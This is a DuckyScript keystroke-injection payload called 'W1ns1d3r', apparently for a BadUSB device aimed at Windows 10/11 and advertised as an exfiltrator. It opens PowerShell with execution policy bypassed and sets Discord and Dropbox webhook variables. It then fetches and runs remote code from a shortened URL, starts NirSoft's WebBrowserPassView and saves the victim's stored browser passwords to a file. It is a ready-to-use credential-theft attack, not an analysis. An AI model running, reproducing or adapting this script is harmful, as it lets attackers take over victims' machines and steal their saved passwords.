REM Title: W1ns1d3r
REM Author: Kali-Gvte (https://github.com/Gvte-Kali/BadStuffHosting/tree/main/W1ns1d3r)
REM Version: 2.3
REM Target:  Windows 10/11 (7/8 not tested)
REM Supported Layout keyboard: US/FR/DE
REM
REM Most awesome Exfiltrator !!
REM
REM ______________________________________________________________________________________________
REM 
REM 888      d888                             888          d8888                            d8888  
REM 888     d8888                             888         d8P888                           d8P888  
REM 888       888                             888        d8P 888                          d8P 888  
REM 88888b.   888   .d88b.           88888b.  88888b.   d8P  888  888d888 88888b.d88b.   d8P  888  
REM 888 "88b  888  d88P"88b          888 "88b 888 "88b d88   888  888P"   888 "888 "88b d88   888  
REM 888  888  888  888  888          888  888 888  888 8888888888 888     888  888  888 8888888888 
REM 888 d88P  888  Y88b 888          888 d88P 888  888       888  888     888  888  888       888  
REM 88888P" 8888888 "Y88888 88888888 88888P"  888  888       888  888     888  888  888       888  
REM                     888          888                                                           
REM                Y8b d88P          888                                                           
REM                 "Y88P"           888                                                           
REM ______________________________________________________________________________________________
REM
REM Usage : Put your discord webhook into $dc | put your dopbox webhook into $db
REM
DELAY 2000
GUI r
DELAY 1000
STRING powershell -NoP -Ep Bypass
ENTER
DELAY 1000
STRING $dc= '' ; $db= ''
ENTER
STRING irm https://shorturl.at/rLQS5
ENTER
DELAY 1000
STRING Get-Nirsoft
ENTER
DELAY 8000
STRING wbpv28821@
ENTER
STRING .\WebBrowserPassView.exe
ENTER
DELAY 6000
CTRL A
CTRL S
DELAY 2000
STRING c:\temp\w3b_br0ws3r_p4ssw0rds.txt
ENTER
DELAY 1000
ALT F4
